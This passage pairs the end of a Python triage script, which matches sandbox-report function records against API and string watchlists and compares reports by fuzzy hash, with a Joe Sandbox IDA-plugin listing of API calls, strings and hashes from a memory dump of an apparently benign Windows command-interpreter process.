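        if m:
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.api_calls.append(ApiCall(m["name"], m["module"], int(m["ref"], 16), sub))
            continue
        m = KV_LINE.match(line)
        if not m:
            continue              # unknown line shape: skip it rather than abort the report
        key, val = m["key"], m["val"].strip()
        if key == "String ID":
            # The view joins referenced strings with '$'; a literal '$' inside a string (the
            # "\$x" token of the first record) cannot be told apart from the separator.
            cur.strings = val.split("$") if val else []
        else:
            cur.meta[key] = val
    return records


WATCH_STRINGS = {"NtQueryInformationProcess", "NTDLL.DLL"}   # assumed analyst watchlists
WATCH_APIS = {"ReadProcessMemory", "GetEnvironmentVariableW"}


def triage(records, watch_strings=WATCH_STRINGS, watch_apis=WATCH_APIS):
    """(instruction fuzzy hash, sorted reasons) for each record hitting a watchlist.  APIs
    reached through a sub-call count too, since the record lists them as the function's."""
    hits = []
    for r in records:
        reasons = {s for s in r.strings if s in watch_strings}
        reasons |= {c.name for c in r.api_calls if c.name in watch_apis}
        if reasons:
            hits.append((r.instruction_fuzzy_hash, sorted(reasons)))
    return hits


def shared_functions(a: List[FunctionRecord], b: List[FunctionRecord]) -> Set[str]:
    """Instruction fuzzy hashes common to two record sets, e.g. this report and a sibling's."""
    return {r.instruction_fuzzy_hash for r in a} & {r.instruction_fuzzy_hash for r in b}
```

Run over a whole report, triage() gives the analyst the records to open first, and shared_functions() across two reports of suspected sibling samples shows which functions they have in common by fuzzy hash. The API ID field is deliberately not inverted back to API names: the view builds it from sorted name fragments, so matching on the direct API lines and the String ID is the reliable route.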
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
• String ID: con
• API String ID: 689241570-4257191772
Similarity
• API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
• String ID: PE
• API String ID: 2941894976-4258593460
APIs
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF64B58849D,?,?,?,00007FF64B58F0C7), ref: 00007FF64B570045
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF64B58F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B570071
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B570092
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF64B5700A7
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B570148
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF64B570181
Similarity
• API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
• String ID:
• API String ID: 734197835-0
Similarity
• API ID: Enum$Openwcsrchr
• String ID: %s=%s$.$\Shell\Open\Command
• API String ID: 3402383852-1459555574
Similarity
• API ID: memset$EnvironmentVariable
• String ID: DIRCMD
• API String ID: 1405722092-1465291664
Similarity
• API ID: ErrorLast$InformationVolumeiswalphatowupper
• String ID: %04X-%04X$:
• API String ID: 930873262-1938371929
Similarity
• API ID: File_get_osfhandle$Pointer$BuffersFlushRead
• String ID:
• API String ID: 3192234081-0
Similarity
• API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
• String ID:
• API String ID: 1313749407-0
Similarity
• API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
• String ID:
• API String ID: 920682188-0
Similarity
• API ID: memsetwcsspn
• String ID:
• API String ID: 3809306610-0
Similarity
• API ID: wcschr$iswdigit$wcstol
• String ID:
• API String ID: 3841054028-0
APIs
• _get_osfhandle.MSVCRT ref: 00007FF64B583687
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF64B56260D), ref: 00007FF64B5836A6
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF64B56260D), ref: 00007FF64B5836EB
• _get_osfhandle.MSVCRT ref: 00007FF64B583703
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF64B56260D), ref: 00007FF64B583722
                                                                              Similarity
                                                                              • API ID: Console$Write_get_osfhandle$Mode
                                                                              • String ID:
                                                                              • API String ID: 1066134489-0
                                                                              • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                              • Instruction ID: d2f3fe39f1a3849d5dd5f99a814425f95fe5bf3bf0ad67a7227b67b8babb515c
                                                                              • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                              • Instruction Fuzzy Hash: 24517E61B1C64296EA287F26E50457AE6A1EF5CB90F085435EE2EC37B2DF7CE4518B00

APIs
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
• String ID:
• API String ID: 3249344982-0
• Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
• Instruction ID: ad4407e9dc4dd4f2f322fc402825ae5eea40b01ec33923a5a19b0a19bc3833a2
• Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
• Instruction Fuzzy Hash: AE414C72A1CB41C6E314BF12E844369FAA4FB9DB94F448234DA5A877B5CF7CD1158B00

APIs
  • Part of subcall function 00007FF64B573578: _get_osfhandle.MSVCRT ref: 00007FF64B573584
  • Part of subcall function 00007FF64B573578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B57359C
  • Part of subcall function 00007FF64B573578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735C3
  • Part of subcall function 00007FF64B573578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735D9
  • Part of subcall function 00007FF64B573578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735ED
  • Part of subcall function 00007FF64B573578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B573602
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF64B573491,?,?,?,00007FF64B584420), ref: 00007FF64B573514
• _get_osfhandle.MSVCRT ref: 00007FF64B573522
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF64B573491,?,?,?,00007FF64B584420), ref: 00007FF64B573541
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF64B573491,?,?,?,00007FF64B584420), ref: 00007FF64B57355E
  • Part of subcall function 00007FF64B5736EC: _get_osfhandle.MSVCRT ref: 00007FF64B573715
  • Part of subcall function 00007FF64B5736EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF64B573770
  • Part of subcall function 00007FF64B5736EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B573791
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
• String ID:
• API String ID: 4057327938-0
• Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
• Instruction ID: 1b8ba1c532ee76bfa60844cc753dd4020880207d1c9c4c7ba8ed116f5f55433a
• Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
• Instruction Fuzzy Hash: 4B316F62B0CB42C6E75CBF25D400079FAA5EF8DB50F588175DA2EC23B7DE6CE8058600

APIs
• _get_osfhandle.MSVCRT ref: 00007FF64B573584
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B57359C
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735C3
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735D9
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735ED
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B573602
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
• Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
• Instruction ID: 77fcd546f27cce107fb0798da351c41e2c93736c2ac9582547f186106171dfb8
• Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
• Instruction Fuzzy Hash: 4D114C21B1CA46C6EA58BF24E544078EAA0FB4E775F149334DA3E823F2DE6CD4468600

APIs
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
• Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
• Instruction ID: 45f12e7e4217ca2d569f6ad7cf96e5caf7a8c75172c569006e62be6ecb857bf5
• Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
• Instruction Fuzzy Hash: AE111262609B41CAEB04FF64E84526873A4F71D758F400A34EA7D877B5EF7CD6558340

APIs
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF64B5871F9
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64B58720D
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF64B587300
  • Part of subcall function 00007FF64B585740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF64B5875C4,?,?,00000000,00007FF64B586999,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B585744
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: OpenSemaphore$CloseErrorHandleLast
• String ID: _p0$wil
• API String ID: 455305043-1814513734
• Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
• Instruction ID: a1b43c73a0510d16337b76d66571b3518d32cbb747a04a75d6d9583e007436b1
• Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
• Instruction Fuzzy Hash: D4618162B2D78285EF29FF56D4102B9A3A1EF8CB80F544531DA1E8B7A6EF3CD5158300

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: iswdigit
• String ID: GeToken: (%x) '%s'
• API String ID: 3849470556-1994581435
• Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
• Instruction ID: 595c0af818281513534fe86b24c4349ceb1004b95aefe87c43a197d25ef84b6d
• Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
• Instruction Fuzzy Hash: 07515821A0D642C5EB28BF1AE44527DB7A0BB5CB54F449835DA6D833B2EF7CE885C710

APIs
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64B589A10
• RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF64B589994
  • Part of subcall function 00007FF64B58A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A77A
  • Part of subcall function 00007FF64B58A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A839
  • Part of subcall function 00007FF64B58A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A850
• wcsrchr.MSVCRT ref: 00007FF64B589A62
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: ErrorLast$CloseEnumOpenwcsrchr
• String ID: %s=%s$.
• API String ID: 3242694432-4275322459
• Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
• Instruction ID: 2b24f8d4795336d0c06bddfbc75a8956114daf5fafeafc07e1b22e6ba4dc8424
• Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
• Instruction Fuzzy Hash: 5D419E21A1D78285EA18BF51E0502BAF2A1AF9D7A0F446234DD7D873F7EE7CE4518700

APIs
• GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF64B5854E6
• CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF64B58552E
  • Part of subcall function 00007FF64B58758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF64B586999,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B5875AE
  • Part of subcall function 00007FF64B58758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF64B586999,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B5875C6
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: ErrorLast$CreateCurrentMutexProcess
• String ID: Local\SM0:%d:%d:%hs$wil$x
• API String ID: 779401067-630742106
• Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
• Instruction ID: 63e222650776b9c5cb63c8a367988007d9daa963f3eee444cf30113537f60f49
• Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
• Instruction Fuzzy Hash: FE51837262C68282EB29BF15F4007FAE761EB8CB84F445031EA1DCBAA6DE7CD5158740

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
Similarity
• API ID: CurrentDirectorytowupper
• String ID: :$:
• API String ID: 238703822-3780739392
• Opcode ID: a6328a6c3dc4b43d0528279963caee78f723bc6a38f6b0cfe87d14265630f542
• Instruction ID: 77331d6cdee2dca27621a214bf7831e230e936a3fb313d37ccc6cc1eb48cafd6
• Opcode Fuzzy Hash: a6328a6c3dc4b43d0528279963caee78f723bc6a38f6b0cfe87d14265630f542
• Instruction Fuzzy Hash: 1811005261C641C2EA29BF61E805239F6A0EF8D799F498032DD1D877B2EE3CD0428704
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                              • API String ID: 3677997916-3870813718
                                                                              • Opcode ID: f05f94d0e8c90ab29cc9672b6bad58f1af5175f7397cd948b2f834cc6da7e466
                                                                              • Instruction ID: a6f27eea6f9bb10aec5bb9cdf961a54233efea7657e29c5f91b395894d2334e3
                                                                              • Opcode Fuzzy Hash: f05f94d0e8c90ab29cc9672b6bad58f1af5175f7397cd948b2f834cc6da7e466
                                                                              • Instruction Fuzzy Hash: 5311287261CA45C7EA24AF24E44026AF7A0FB8A764F405231DA9D42779DF7CC448CF00
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcsrchr$wcschr
                                                                              • String ID:
                                                                              • API String ID: 110935159-0
                                                                              • Opcode ID: aa437b30edfeea6c79ee8a3d268e9650db73263b89b04e44864cdff78747c223
                                                                              • Instruction ID: 17c5ba25b19695352027ba18cf8387520307035b5ee9c207f4ba178350bc9ab2
                                                                              • Opcode Fuzzy Hash: aa437b30edfeea6c79ee8a3d268e9650db73263b89b04e44864cdff78747c223
                                                                              • Instruction Fuzzy Hash: EE51A362B0D78685FE69BF15E4043F9A6A1AF4CBA4F045130CE6D8B7A6DE3CE5558200
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$CurrentDirectorytowupper
                                                                              • String ID:
                                                                              • API String ID: 1403193329-0
                                                                              • Opcode ID: 551be3f87909853a01787b2c064555cc9cf119e68c8c6485403ce92ba455aa8e
                                                                              • Instruction ID: 26afa52f8343ea04ffaf99cc040d4662412c9d08f603343009444a97d64b6e7a
                                                                              • Opcode Fuzzy Hash: 551be3f87909853a01787b2c064555cc9cf119e68c8c6485403ce92ba455aa8e
                                                                              • Instruction Fuzzy Hash: A2518026B0D6C186EB29FF21D9006BAB7A0EF4C758F45C135CA2D876A6EFBC95448710
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
• Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess_setjmp
                                                                              • String ID:
                                                                              • API String ID: 777023205-0
                                                                              • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                              • Instruction ID: 7f70dd58b3785a621e33ae70e19cfff81c81a1e39233236c83a74c56ed9a4b11
                                                                              • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                              • Instruction Fuzzy Hash: 66512830E0EA4299EA59BF15F880578F6A0FF4C750F545836DA6ED62B3DF3DA441CA10
                                                                              APIs
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B56B4BD
                                                                                • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706D6
                                                                                • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706F0
                                                                                • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B57074D
                                                                                • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B570762
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B56B518
